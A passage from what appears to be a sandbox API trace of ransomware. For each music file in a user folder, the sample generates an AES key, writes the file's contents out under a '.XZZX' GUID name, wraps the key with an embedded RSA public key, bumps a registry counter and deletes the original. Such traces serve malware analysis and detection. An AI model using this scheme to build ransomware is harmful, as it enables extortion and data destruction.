LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0119.624] lstrcpyW (in: lpString1=0x434f460, lpString2="45 WvgNJuT9AYaRmo.m4a" | out: lpString1="45 WvgNJuT9AYaRmo.m4a") returned="45 WvgNJuT9AYaRmo.m4a" [0119.624] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0119.624] SetErrorMode (uMode=0x1) returned 0x1 [0119.624] lstrcpyW (in: lpString1=0x434f860, lpString2="45 WvgNJuT9AYaRmo.m4a" | out: lpString1="45 WvgNJuT9AYaRmo.m4a") returned="45 WvgNJuT9AYaRmo.m4a" [0119.624] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x6fc4cb7c, Data2=0x11ee, Data3=0x43ed, Data4=([0]=0xa1, [1]=0xd9, [2]=0x6e, [3]=0x3a, [4]=0x2, [5]=0xab, [6]=0x63, [7]=0xcb))) returned 0x0 [0119.624] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\45 WvgNJuT9AYaRmo.m4a") returned 100 [0119.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0119.625] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\FA78694804C1E3566FC4CB7C08F6C79E.XZZX") returned 116 [0119.625] StrStrW (lpFirst="45 WvgNJuT9AYaRmo.m4a", lpSrch="XZZX") returned 0x0 [0119.625] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\45 WvgNJuT9AYaRmo.m4a", dwFileAttributes=0x20) returned 1 [0119.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\45 WvgNJuT9AYaRmo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\45 wvgnjut9ayarmo.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0119.626] ReadFile (in: hFile=0x584, lpBuffer=0x3ccd980, nNumberOfBytesToRead=0x2e1c, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x3ccd980*, lpNumberOfBytesRead=0x434e418*=0x2e1c, lpOverlapped=0x0) returned 1 [0119.627] CloseHandle (hObject=0x584) returned 1 [0119.627] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0119.627] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0119.628] SetErrorMode (uMode=0x1) returned 0x1 [0119.628] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0119.628] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc6d40) returned 1 [0119.630] CryptGenKey (in: hProv=0x3cc6d40, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5a50) returned 1 [0119.762] CryptExportKey (in: hKey=0x3a5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0119.762] CryptExportKey (in: hKey=0x3a5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x434e41c | out: pbData=0x40a0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0119.762] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0119.763] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0119.763] CryptDestroyKey (hKey=0x3a5a50) returned 1 [0119.763] CryptReleaseContext (hProv=0x3cc6d40, dwFlags=0x0) returned 1 [0119.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\FA78694804C1E3566FC4CB7C08F6C79E.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\fa78694804c1e3566fc4cb7c08f6c79e.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0119.764] WriteFile (in: hFile=0x584, lpBuffer=0x3ccd980*, nNumberOfBytesToWrite=0x2e1c, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3ccd980*, lpNumberOfBytesWritten=0x434e438*=0x2e1c, lpOverlapped=0x0) returned 1 [0119.764] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2e1c [0119.764] WriteFile (in: hFile=0x584, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0119.764] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2e21 [0119.765] WriteFile (in: hFile=0x584, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x2a, lpOverlapped=0x0) returned 1 [0119.765] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2e4b [0119.765] WriteFile (in: hFile=0x584, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0119.765] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2e50 [0119.765] SetErrorMode (uMode=0x1) returned 0x1 [0119.765] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0119.765] OutputDebugStringW (lpOutputString="end") [0119.765] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.765] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0119.765] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3cc6d40) returned 1 [0119.766] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc6d40, dwCertEncodingType=0x1, pInfo=0x3cb1358*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1388*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1390*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3a5cd0) returned 1 [0119.766] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0119.767] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0119.767] CryptEncrypt (in: hKey=0x3a5cd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0119.767] CryptEncrypt (in: hKey=0x3a5cd0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc6dc8*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc6dc8*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0119.767] WriteFile (in: hFile=0x584, lpBuffer=0x3cc6dc8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc6dc8*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0119.767] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0119.767] WriteFile (in: hFile=0x584, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0119.767] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0119.767] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0119.767] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x580) returned 0x0 [0119.767] RegQueryValueExW (in: hKey=0x580, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0x79, lpcbData=0x434dfdc*=0x4) returned 0x0 [0119.767] RegCloseKey (hKey=0x580) returned 0x0 [0119.768] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x580) returned 0x0 [0119.768] RegSetValueExW (in: hKey=0x580, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0x7a, cbData=0x4 | out: lpData=0x434dfec*=0x7a) returned 0x0 [0119.768] RegCloseKey (hKey=0x580) returned 0x0 [0119.768] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.768] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0119.768] CloseHandle (hObject=0x584) returned 1 [0119.769] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0119.770] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0119.770] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\45 WvgNJuT9AYaRmo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\45 wvgnjut9ayarmo.m4a")) returned 1 [0119.771] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\45 WvgNJuT9AYaRmo.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\45 wvgnjut9ayarmo.m4a")) returned 0 Thread: id = 386 os_tid = 0x910 [0119.772] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0119.772] lstrcpyW (in: lpString1=0x420f460, lpString2="nvHO8po6UT1lfU646l.mp3" | out: lpString1="nvHO8po6UT1lfU646l.mp3") returned="nvHO8po6UT1lfU646l.mp3" [0119.772] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\" [0119.772] SetErrorMode (uMode=0x1) returned 0x1 [0119.772] lstrcpyW (in: lpString1=0x420f860, lpString2="nvHO8po6UT1lfU646l.mp3" | out: lpString1="nvHO8po6UT1lfU646l.mp3") returned="nvHO8po6UT1lfU646l.mp3" [0119.772] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xc9dc8d36, Data2=0x22c0, Data3=0x4b19, Data4=([0]=0xa1, [1]=0x3, [2]=0xb5, [3]=0x36, [4]=0x8c, [5]=0xd0, [6]=0x98, [7]=0x73))) returned 0x0 [0119.773] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\nvHO8po6UT1lfU646l.mp3") returned 101 [0119.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0119.773] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\B02B14800A31A4C0C9DC8D360E528908.XZZX") returned 116 [0119.773] StrStrW (lpFirst="nvHO8po6UT1lfU646l.mp3", lpSrch="XZZX") returned 0x0 [0119.773] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\nvHO8po6UT1lfU646l.mp3", dwFileAttributes=0x20) returned 1 [0119.773] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\nvHO8po6UT1lfU646l.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\nvho8po6ut1lfu646l.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x57c [0119.773] ReadFile (in: hFile=0x57c, lpBuffer=0x3ccd980, nNumberOfBytesToRead=0x601a, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3ccd980*, lpNumberOfBytesRead=0x420e418*=0x601a, lpOverlapped=0x0) returned 1 [0119.774] CloseHandle (hObject=0x57c) returned 1 [0119.774] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0119.775] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0119.775] SetErrorMode (uMode=0x1) returned 0x1 [0119.775] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0119.775] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc6e50) returned 1 [0119.778] CryptGenKey (in: hProv=0x3cc6e50, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5a50) returned 1 [0119.908] CryptExportKey (in: hKey=0x3a5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0119.908] CryptExportKey (in: hKey=0x3a5a50, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0119.908] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0119.909] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0119.909] CryptDestroyKey (hKey=0x3a5a50) returned 1 [0119.909] CryptReleaseContext (hProv=0x3cc6e50, dwFlags=0x0) returned 1 [0119.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\DqOPM\\B02B14800A31A4C0C9DC8D360E528908.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\auosv3m 9vtnbjukze\\9y_m-ovb2iyyx\\dqopm\\b02b14800a31a4c0c9dc8d360e528908.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x57c [0119.909] WriteFile (in: hFile=0x57c, lpBuffer=0x3ccd980*, nNumberOfBytesToWrite=0x601a, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ccd980*, lpNumberOfBytesWritten=0x420e438*=0x601a, lpOverlapped=0x0) returned 1 [0119.910] SetFilePointer (in: hFile=0x57c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x601a [0119.910] WriteFile (in: hFile=0x57c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0119.910] SetFilePointer (in: hFile=0x57c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x601f [0119.910] WriteFile (in: hFile=0x57c, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x2c, lpOverlapped=0x0) returned 1 [0119.910] SetFilePointer (in: hFile=0x57c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x604b [0119.910] WriteFile (in: hFile=0x57c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0119.910] SetFilePointer (in: hFile=0x57c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6050 [0119.910] SetErrorMode (uMode=0x1) returned 0x1 [0119.910] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0119.910] OutputDebugStringW (lpOutputString="end") [0119.910] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----và\x83Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.911] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0119.911] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc6e50) returned 1 [0119.911] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc6e50, dwCertEncodingType=0x1, pInfo=0x3cb1428*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1458*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1460*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5d10) returned 1 [0119.911] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0119.912] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0119.912] CryptEncrypt (in: hKey=0x3a5d10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0119.912] CryptEncrypt (in: hKey=0x3a5d10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc6ed8*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc6ed8*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0119.912] WriteFile (in: hFile=0x57c, lpBuffer=0x3cc6ed8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc6ed8*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0119.912] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0119.912] WriteFile (in: hFile=0x57c, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0119.912] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0119.912] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0119.912] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", 